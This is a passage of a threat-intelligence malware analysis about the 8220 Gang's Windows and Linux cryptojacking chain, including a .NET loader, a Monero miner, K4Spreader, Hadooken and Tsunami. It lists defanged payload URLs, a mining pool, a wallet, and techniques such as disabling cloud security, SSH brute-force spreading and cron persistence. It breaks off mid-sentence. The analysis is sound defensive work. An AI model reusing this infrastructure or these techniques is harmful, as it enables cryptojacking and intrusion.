Comment
Author: Admin | 2025-04-28
Attributed to Gang 8220.Figure 3. Windows infection routineLoaderCCleaner is a loader written in .NET that performs the following actions:It downloads a file from a specified URL : “hxxp://154.213.192[.]44/Ueordwfkay.pdf“The file is loaded into memory and decrypted using 3DES, resulting in a .NET DLL.A class from the DLL is then loaded. While the exact invocation is unclear, this process downloads and executes an encrypted payload from “hxxp://154.213.192[.]44/plugin3.dll“.Finally it launches the cryptominer.CryptominerThe cryptominer mines Monero through a private mining pool with the IP address 51.222.111[.]116:80, using a wallet identified as : 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ. Ahnlab Security Emergency Response Center, in an April 2023 report, documented a similar infection chain involving this same wallet, linking it to the 8220 Gang.Figure 4. pcap of the mining activity – Windows caseLinuxThe infection starts with the execution of two scripts: a shell script named “c” and a Python script named “y“.The “c“ script carries out three main tasks: disabling cloud protection tools like Aliyun, downloading and executing the Hadooken payload, and attempting to spread across the internal network using SSH. To move laterally, the script inspects various files, including the bash history, “/etc/hosts” and “.ssh/config”. It then builds up lists to iterate through to attempt SSH brute force. If successful, it downloads and executes the initial infection script (“c” script).The “y“ script simply downloads and runs the Hadooken malware.Figure 5. Linux infection routineK4SpreaderK4Spreader is a Go-based malware, named Goku in the observed case, likely a reference to the character from the Dragon Ball manga. In its report, AquaSec suggests that the name “Hadooken” is a reference to the “Surge Fist” attack from the Street Fighter game. Similarly, the name “Goku” follows the same thematic connection.The malware performs several malicious actions:disabling various cloud security mechanisms;searching for and terminates competing cryptomining processes to take control of the resources;deploying additional malware, including the Tsunami backdoor and a PwnRig cryptominer, likely for Monero;establishing persistence using cron jobs by creating two crontab entries: one that executes itself every 2 minutes and another that downloads “c” script on “hxxp://sck-dns[.]cc/c” and runs it every 5 minutes.In June 2024, XLab, a Chinese cybersecurity firm, also reported on the 8220 Gang’s use of K4Spreader.The analysed malware is not obfuscated, and the function names are notably clear and descriptive. While most are labelled in English, some are in Portuguese, which is unexpected considering that the intrusion set is believed to be of Chinese origin.TsunamiTsunami, is a Linux-based malware primarily
Add Comment